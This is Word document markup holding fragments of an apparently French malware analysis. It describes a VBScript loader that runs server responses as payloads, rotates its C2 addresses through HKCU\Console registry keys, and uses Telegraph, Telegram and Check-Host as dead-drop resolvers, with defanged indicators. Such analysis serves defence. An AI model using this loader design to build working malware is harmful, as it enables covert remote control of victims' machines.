                            <a:pt x="118237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2608" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2614295</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2724159</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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4656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2724159</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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6704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2724159</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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8992" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3678555</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2724159</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2767965" cy="1637030"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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7965" cy="16370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67965" h="1637030">
                          <a:moveTo>
                            <a:pt x="0" y="1437639"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="1637030"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="750569" y="1248409"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="750569" y="1049019"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1195069" y="1049019"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1195069" y="1248409"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1611629" y="859789"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1611629" y="660399"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2767330" y="660399"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2767330" y="859789"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1610994" y="661034"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2767965" y="661034"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1064259" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1064259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0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4161799</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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3088" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5888355</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4161799</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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5136" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3970655</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4161799</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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61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5444487</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="2999117"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="110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 l="-11" r="-11" t="-41" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="29991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2999117">
                          <a:moveTo>
                            <a:pt x="0" y="2999117"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="299911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299911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718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820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9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1251173</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Remarque : il est observé une valeur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Content-Length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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> pour une requête GET, ce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0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1447823</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2270897" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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08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constitue une anomalie significative.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1722778</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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traite les réponses HTTP en fonction du </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle17"/>
                            <w:spacing w:val="1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">status code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remplissant deux fonctions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2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1896133</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4770269" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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02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distinctes : l’exécution de la charge utile ou les mises à jour de configuration.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332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2171088</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Exécution de la charge utile : si le code de réponse est 200 OK et que la taille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435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2344443</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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corps dépasse 1 000 octets, le chargeur traite le contenu comme le script VBScript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537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2517798</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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9"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">de l’étape suivan</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="23"/>
                          </w:rPr>
                          <w:t xml:space="preserve">te. Il exécute immédiatement </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="26"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> cette charge utile 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640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2709768</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5410580" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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058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ExecuteGlobal()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. Simultanément, il met à jour</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="-31"/>
                          </w:rPr>
                          <w:t xml:space="preserve">  </w:t>
                        </w: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HKCU\Console\HistoryURL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742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2906418</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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avec l’URL actuellement valide afin de garantir le bon fonctionnement du canal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844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3079773</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4095518" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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55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commande et de contrôle pour la prochaine itération de la boucle.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947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3370168</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Mise à jour de la configuration : si le code de réponse est </w:t>
                        </w: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404 Not Found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,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049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3566818</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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chargeur met en œuvre un mécanisme de mise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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> à jou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r. Il analyse le corps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3758788</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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réponse à la recherche d’une chaîne contenant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https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 ; s’il en trouve une, celle-ci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254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3955438</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385953" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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est interprétée comme une nouvell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e UR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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">L C2. Le chargeur met à jo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ur à la fois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3568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4147408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5366903" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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690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HKCU\Console\WindowsResponby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et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HKCU\Console\HistoryURL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avec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459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4344058</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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nouvelle adresse, là encore pour garantir un C2 fonctionnel pour la prochaine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561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4517413</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1362986" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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29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itération de la boucle.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6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4792368</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Si les clés de registre mises en cache ne fonctionnent pas, le chargeur interroge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7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4965723</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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services tiers légitimes afin d'obtenir une nouvelle adresse C2 via Telegraph, Telegram ou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8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5139078</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="804047" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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04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Check-Host.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9712" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>984885</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8420120</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5660836" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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083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7 – Captures d'écran de check-host.net (en haut à gauche), Telegram (en haut à droite), Telegra.ph (en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0736" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1929765</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8551565</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3739337" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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93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bas à gauche) et Telegram (en bas à droite) hébergeant des serveurs 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9079253</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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 tableau ci-dessous présente la liste des DDR, des URL extraites et des clés de registre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2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9252608</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4522442" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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24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spécifiques renseignées une fois la récupération effectuée avec succès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38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483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585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688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790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79097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60085" cy="954404"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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9544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954404">
                          <a:moveTo>
                            <a:pt x="4925059" y="954404"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="954404"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4925059" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4925059" y="954404"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1630679" y="954404"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4924425" y="954404"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4924425" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1630679" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1630679" y="954404"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="954404"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1630045" y="954404"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1630045" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="95440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30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5233044</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="1417319"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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417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417319">
                          <a:moveTo>
                            <a:pt x="0" y="909319"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="909319"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1417319"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1417319"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="9093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46709"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="34670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609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60085" cy="954404"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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9544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954404">
                          <a:moveTo>
                            <a:pt x="4925059" y="954404"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="954404"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4925059" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4925059" y="954404"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1630679" y="954404"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4924425" y="954404"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4924425" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1630679" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1630679" y="954404"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="954404"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1630045" y="954404"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1630045" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="95440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814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5233044</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="1417319"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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417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417319">
                          <a:moveTo>
                            <a:pt x="0" y="909319"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="909319"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1417319"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1417319"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="9093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46709"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="34670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3264" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5897879</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1381769</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="690244" cy="2465704"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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244" cy="2465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244" h="2465704">
                          <a:moveTo>
                            <a:pt x="121919" y="2465704"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="567054" y="2465704"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="567054" y="2266949"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="121919" y="2266949"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="121919" y="2465704"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1670684"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="690244" y="1670684"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="690244" y="1471929"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1471929"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1670684"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="963294"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="690244" y="963294"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="690244" y="764539"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="764539"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="963294"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="121919" y="414654"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="567054" y="414654"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="567054" y="215899"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="121919" y="215899"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="121919" y="414654"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="198754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="690244" y="198754"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="690244" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="198754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0432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67070" cy="3967480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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3967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3967480">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="3967480"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3964305"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5767070" y="3964305"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3256914"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="3256914"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2372994"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="2372994"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1665604"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="1665604"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="958215"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="958215"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="576707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1456" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2531110</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>996959</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="3954780"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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95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954780">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="395478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3504" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5825490</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>990609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="835663" cy="3967480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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5663" cy="3967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5659" h="3967480">
                          <a:moveTo>
                            <a:pt x="835659" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="835659" y="3967480"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="6349"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="396113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3984" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5897879</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1381769</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="690879" cy="2466340"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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879" cy="24663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879" h="2466340">
                          <a:moveTo>
                            <a:pt x="122555" y="2466340"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="122555" y="2266949"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="567690" y="2465705"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="121919" y="2465705"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="567054" y="2266949"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="567054" y="2466340"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="121919" y="2267584"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="567690" y="2267584"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="634" y="1671319"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="634" y="1471929"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="690879" y="1670685"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="1670685"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="690244" y="1471929"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="690244" y="1671319"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="1472565"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="690879" y="1472565"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="634" y="963929"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="634" y="764540"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="690879" y="963294"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="963294"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="690244" y="764540"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="690244" y="963929"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="765175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="690879" y="765175"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="122555" y="415289"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="122555" y="215899"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="567690" y="414655"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="121919" y="414655"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="567054" y="215899"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="567054" y="415289"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="121919" y="216534"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="567690" y="216534"/>
                          </a:lnTo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690879" y="198754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="198754"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="690244" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="690244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500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603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7056" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5890895</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="780933" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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0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Cible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8080" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5910580</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1175408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="742198" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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21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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">le registre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9104" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3228975</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1303678</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1936340" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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63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URL extraite (désobfusquée)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0128" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1119505</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1303678</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1230317" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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03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URL codée en dur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1152" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5916929</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1367378</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="689507" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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50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HKCU\Con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2176" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6039485</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1582643</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="444334" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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33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sole\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1950985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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4224" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2567305</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1950985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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52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2127515</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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8"/>
                          </w:rPr>
                          <w:t xml:space="preserve">te.legra[.]ph/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6272" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
